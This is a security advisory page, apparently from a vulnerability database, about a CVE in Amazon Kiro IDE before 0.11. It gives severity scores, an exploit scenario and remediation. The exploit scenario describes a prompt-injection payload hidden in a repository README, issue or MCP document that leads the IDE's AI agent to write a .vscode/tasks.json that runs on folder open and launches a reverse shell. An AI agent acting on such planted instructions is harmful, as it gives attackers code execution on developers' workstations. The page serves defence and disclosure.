EUVD-2026-33964
GHSA-83m8-c7v3-rw3w
Severity by source
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Lifecycle Timeline
6DescriptionCVE.org
Insufficient access control restrictions in the file write tool in Amazon Kiro IDE before version 0.11 might allow remote unauthenticated actors to execute arbitrary commands via crafted instructions that cause writes to execution-sensitive paths (such as .vscode/tasks.json), enabling auto-execution on folder open.
To remediate this issue, users should upgrade to Kiro IDE version 0.11 or later.
AnalysisAI
Arbitrary command execution in Amazon Kiro IDE versions prior to 0.11 allows remote attackers to plant malicious task definitions (e.g., .vscode/tasks.json) via the IDE's file write tool, which then auto-execute when a developer opens the affected workspace folder. The CVSS 4.0 score of 8.6 reflects network-reachable abuse with high confidentiality, integrity, and availability impact contingent on a single user action (folder open). …
Unlock full vulnerability intelligence
- Risk assessment & exploitation conditions
- Attack chain visualization
- Remediation with exact patch versions
- Threat intelligence from 22 sources
- Personal watchlist & email alerts
Free forever · No credit card required
Attack ChainAIDerived
Hypothetical attack flow derived from CVE metadata
Vulnerability AssessmentAI
| Exploitation | Exploitation requires (1) the victim to be running Kiro IDE before version 0.11 with the agent's file write tool enabled, (2) attacker-controlled content to reach that tool - typically via a crafted repository, prompt-injection payload in indexed/untrusted content, or an MCP/tool response the agent is induced to act on, and (3) the user to open or reopen the affected workspace folder (CVSS UI:A), which triggers the planted .vscode/tasks.json (or equivalent execution-sensitive path) on folderOpen. … Additional conditions and limiting factors are described in the full assessment. |
| Risk Assessment | The CVSS 4.0 vector AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H is consistent with the described attack: remote, low complexity, no privileges, but requires the user to open (or reopen) the poisoned folder - captured by UI:A (Active user interaction). … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in. |
| Exploit Scenario | An attacker publishes a repository (or a prompt-injection payload in a README, issue, or MCP-served document) that instructs the Kiro agent to create or modify .vscode/tasks.json with a task whose runOptions.runOn is 'folderOpen' and whose command launches a reverse shell or downloader. The developer accepts the agent's edits and reopens the folder - or simply reloads the window - at which point the malicious task executes under the developer's user account, yielding code execution on the workstation. … |
| Remediation | Vendor-released patch: Amazon Kiro IDE 0.11 - upgrade all developer workstations to 0.11 or later per the AWS security bulletin (https://aws.amazon.com/security/security-bulletins/2026-037-aws/) and the changelog (https://kiro.dev/changelog/ide/0-11/). … Detailed patch versions, workarounds, and compensating controls in full report. |
Recommended ActionAI
24 hours: Identify all developers using Amazon Kiro IDE versions prior to 0.11; restrict their access to external code repositories pending remediation and enable monitoring of their development machines for suspicious process execution. …
Sign in for detailed remediation steps and compensating controls.
Threat intelligence, references, and detailed analysis are available after sign-in.
More from same product – last 7 days
Share
External POC / Exploit Code
Leaving vuln.today